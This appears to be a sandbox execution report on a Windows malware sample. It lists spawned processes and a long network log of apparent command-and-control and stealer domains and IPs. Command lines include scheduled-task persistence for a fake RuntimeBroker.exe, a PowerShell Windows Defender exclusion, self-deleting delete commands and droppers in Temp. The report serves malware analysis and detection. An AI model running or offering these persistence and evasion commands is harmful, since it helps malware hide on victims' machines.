"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"

C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:8

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\ProgramData\javaw.exe

C:\ProgramData\javaw.exe

C:\Windows\system32\WerFaultSecure.exe

"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 3224 -i 3224 -h 416 -j 408 -s 448 -d 6092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 47024 -ip 47024

C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe

"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 47024 -s 304

C:\Windows\system32\WerFaultSecure.exe

C:\Windows\system32\WerFaultSecure.exe -u -p 3224 -s 1228

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "

C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"

C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"

C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe

"C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "

C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Edge.exe

"C:\Users\Admin\AppData\Local\Temp\Edge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe

"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"

C:\Users\Admin\AppData\Local\Temp\Files\t1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"

C:\Windows\system32\PING.EXE

ping 1.1.1.1 -n 1 -w 3000

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 dev.cyberark-igiwax.com udp
US 44.243.209.238:80 dev.cyberark-igiwax.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 238.209.243.44.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 alien-training.com udp
IE 52.218.61.44:80 alien-training.com tcp
US 20.83.148.22:8080 20.83.148.22 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 192.168.2.15:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 44.61.218.52.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 224.0.0.251:5353 udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 exchange-reasonably.gl.at.ply.gg udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8777 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rddissisifigifidi.net udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
BG 87.120.125.214:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
SE 193.233.255.106:69 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
BG 87.120.125.214:443 tcp
RU 185.215.113.66:80 twizt.net tcp
NL 149.154.167.220:443 api.telegram.org tcp
BG 87.120.125.214:443 tcp
BG 87.120.125.214:443 tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
NL 149.154.167.220:443 api.telegram.org tcp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
US 8.8.8.8:53 millyscroqwp.shop udp
US 8.8.8.8:53 locatedblsoqp.shop udp
US 8.8.8.8:53 traineiwnqo.shop udp
US 8.8.8.8:53 condedqpwqm.shop udp
US 8.8.8.8:53 evoliutwoqm.shop udp
US 8.8.8.8:53 stagedchheiqwo.shop udp
US 8.8.8.8:53 stamppreewntnq.shop udp
US 8.8.8.8:53 caffegclasiqwp.shop udp
US 8.8.8.8:53 steamcommunity.com udp
RU 185.215.113.66:80 twizt.net tcp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.163:80 176.113.115.163 tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 163.115.113.176.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
GB 20.26.156.215:443 github.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 twizt.net tcp
BG 87.120.125.214:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.16:80 185.215.113.16 tcp
GB 23.214.143.155:443 steamcommunity.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
SE 193.233.255.106:69 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 184.221.38.209.in-addr.arpa udp
DE 46.235.26.83:8080 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
RU 185.215.113.117:80 tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 tacitglibbr.biz udp
US 172.67.164.37:443 tacitglibbr.biz tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 immureprech.biz udp
US 104.21.22.222:443 immureprech.biz tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 37.164.67.172.in-addr.arpa udp
US 8.8.8.8:53 222.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.32.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 172.67.206.53:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 53.206.67.172.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 awake-weaves.cyou udp
US 172.67.143.116:443 awake-weaves.cyou tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 104.21.27.63:443 sordid-snaked.cyou tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 63.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
PL 45.80.158.31:80 tcp
PL 45.80.158.31:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
IR 5.134.199.85:40500 udp
YE 94.26.219.44:40500 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 85.199.134.5.in-addr.arpa udp
US 192.210.150.26:8787 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 jirafasaltas.fun udp
US 104.21.57.227:443 jirafasaltas.fun tcp
US 8.8.8.8:53 227.57.21.104.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
MX 189.252.61.8:40500 udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 8.61.252.189.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 cowod.hopto.org udp
US 20.83.148.22:80 tcp
DE 147.28.185.29:80 147.28.185.29 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
NL 206.166.251.4:8080 tcp
US 8.8.8.8:53 29.185.28.147.in-addr.arpa udp
KZ 92.47.52.79:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 79.52.47.92.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:5152 twizthash.net tcp
IR 2.177.40.206:40500 udp
SE 193.233.255.106:69 tcp
US 20.83.148.22:80 tcp
NL 149.154.167.99:443 t.me tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
US 20.83.148.22:80 tcp
FI 95.217.25.228:443 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
PL 45.80.158.31:80 tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
RU 45.150.24.42:40500 udp
US 8.8.8.8:53 42.24.150.45.in-addr.arpa udp
US 8.8.8.8:53 lsks.volamngayxua.net udp
VN 103.200.23.247:80 lsks.volamngayxua.net tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 247.23.200.103.in-addr.arpa udp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 fivexc5pt.top udp
IR 5.239.109.92:40500 udp
US 192.210.150.26:8787 tcp
IR 2.191.61.218:40500 tcp
US 8.8.8.8:53 92.109.239.5.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 38.180.203.11:1010 tcp
SY 82.137.239.235:40500 udp
US 8.8.8.8:53 235.239.137.82.in-addr.arpa udp
RU 185.215.113.36:80 185.215.113.36 tcp
VN 14.243.221.170:2654 tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
US 8.8.8.8:53 fivexc5pt.top udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
SE 151.177.61.79:4782 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 208.95.112.1:80 ip-api.com tcp
IR 217.171.148.45:40500 udp
US 8.8.8.8:53 45.148.171.217.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
RU 185.215.113.67:15206 tcp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
KZ 92.46.40.130:40500 udp
FI 95.217.25.228:443 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
N/A 192.168.190.133:4444 tcp
US 8.8.8.8:53 fivexc5pt.top udp
NL 62.60.217.159:15666 tcp
US 192.210.150.26:8787 tcp
IN 116.206.151.203:478 116.206.151.203 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
SE 193.233.255.106:69 tcp
KZ 213.211.105.70:40500 udp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
US 8.8.8.8:53 70.105.211.213.in-addr.arpa udp
PL 45.80.158.31:80 tcp
RU 185.215.113.66:80 twizthash.net tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
CN 183.57.21.131:8095 tcp
RU 185.215.113.67:21405 tcp
MX 189.136.17.247:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 247.17.136.189.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
IR 94.183.35.46:40500 tcp
US 20.83.148.22:80 tcp
IR 78.38.29.237:40500 udp
US 8.8.8.8:53 237.29.38.78.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
VN 14.243.221.170:2654 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
GB 38.180.203.11:1010 tcp
RU 185.215.113.66:5152 twizthash.net tcp
SE 151.177.61.79:4782 tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 static.trafficjunky.com udp
US 8.8.8.8:53 ei.phncdn.com udp
GB 64.210.156.23:443 ei.phncdn.com tcp
GB 64.210.156.23:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
US 20.83.148.22:80 tcp
US 206.217.142.166:1234 tcp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 23.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 17.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 media.trafficjunky.net udp
US 8.8.8.8:53 cdn1-smallimg.phncdn.com udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.22:443 media.trafficjunky.net tcp
GB 64.210.156.17:443 media.trafficjunky.net tcp
US 8.8.8.8:53 156.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 22.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 168.201.250.142.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 ss.phncdn.com udp
US 8.8.8.8:53 a.adtng.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 192.210.150.26:8787 tcp
US 66.254.114.171:443 a.adtng.com tcp
